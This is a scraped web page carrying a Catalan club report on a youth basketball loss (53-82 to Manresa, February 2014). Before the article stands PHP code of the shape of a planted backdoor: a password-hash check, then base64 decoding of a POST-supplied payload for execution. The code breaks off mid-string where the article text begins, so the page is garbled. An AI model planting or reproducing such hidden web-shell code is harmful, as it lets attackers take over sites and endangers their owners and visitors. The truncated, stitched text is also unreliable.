function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí A es passa 15 minuts sense anotar en joc i perd contra el Manresa (53-82) - Tgn Bàsquet Club -

L’infantil masculí A es passa 15 minuts sense anotar en joc i perd contra el Manresa (53-82)

Updated: febrer 16, 2014

L’infantil masculí A va patir 15 minuts de sequera anotadora i va caure contra el Manresa. L’equip local, que va fer un bon inici de partit, va plantar cara fins el minut 17 en què el marcador mostrava un resultat de 26-27. Aleshores, el TGN Bàsquet va desaparèixer de la pista i va ser incapaç d’anotar un sol punt en joc en 15 minuts -només 4 punts des de la línia de personal-. El Manresa ho va aprofitar i, amb un parcial de 26-6 en aquest període de temps, va deixar el partit vist per sentència. Els nombrosos tirs lliures fallats pels locals (36) van ser un llast que mai van poder superar.